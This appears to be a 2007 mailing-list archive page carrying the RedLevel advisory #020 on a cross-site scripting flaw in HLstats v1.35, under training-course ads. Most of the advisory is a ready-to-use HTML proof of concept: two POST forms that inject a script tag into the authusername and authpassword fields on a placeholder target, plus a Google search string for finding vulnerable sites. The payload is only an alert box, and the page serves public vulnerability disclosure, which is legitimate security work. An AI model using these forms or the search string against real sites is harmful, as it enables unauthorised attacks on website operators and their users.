Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security Vuln-Dev
[Top] [All Lists]

RedLevel Advisory #020 - HLstats v1.35 Cross-Site Scripting Vulnerabilit

Subject: RedLevel Advisory #020 - HLstats v1.35 Cross-Site Scripting Vulnerability #3
Date: 21 May 2007 19:47:06 -0000
<!--

HLstats v1.35 - Cross-Site Scripting Vulnerability #3

Vulnerable Variables: authusername, authpassword
Vulnerable File: hlstats.php
Vulnerable: HLstats 1.2 (other versions may also be vulnerable)
Google d0rk: "generated in real-time by HLstats"

John Martinelli
john@martinelli.com

RedLevel Security
http://www.RedLevel.org

May 21st, 2007

!-->

<html>
<head><title>HLstats v1.35 - Cross-Site Scripting Vulnerability #3</title><body>
<center><br><br>
<font size=4>HLstats v1.35 - Cross-Site Scripting Vulnerability #3</font><br>
<font size=3>discovered by <a href="http://john-martinelli.com";>John 
Martinelli</a> of <a href="http://redlevel.org";>RedLevel Security</a><br><br>
Google d0rk: <a 
href="http://www.google.com/search?q=%22generated+in+real-time+by+hlstats%22";>&quot;generated
 in real-time by HLstats&quot;</a>
</font><br><br><br>

<center>file <b>hlstats.php</b> - variable <b>authusername</b> - method 
<b>post</b></center><br>
<form 
action="http://www.target.com/hlstats/hlstats.php?mode=admin&act_sort=description&act_sortorder=asc&weap_sort=code&weap_sortorder=asc";
 method="post">
<input size=75 name="authusername" value=">&quot;><script>alert(1)</script>">
<input type="hidden" name="authpassword" value="password">
<input type="hidden" name="authsavepass" value="off">
<input type=submit value="Execute XSS Attack" class="button">
</form>
<br>

<center>file <b>hlstats.php</b> - variable <b>authpassword</b> - method 
<b>post</b></center><br>
<form 
action="http://www.target.com/hlstats/hlstats.php?mode=admin&act_sort=description&act_sortorder=asc&weap_sort=code&weap_sortorder=asc";
 method="post">
<input size=75 name="authpassword" value=">&quot;><script>alert(1)</script>">
<input type="hidden" name="authusername" value="username">
<input type="hidden" name="authsavepass" value="off">
<input type=submit value="Execute XSS Attack" class="button">
</form>
<br><br><br>

</body></html>

<Prev in Thread] Current Thread [Next in Thread>
  • RedLevel Advisory #020 - HLstats v1.35 Cross-Site Scripting Vulnerability #3, john <=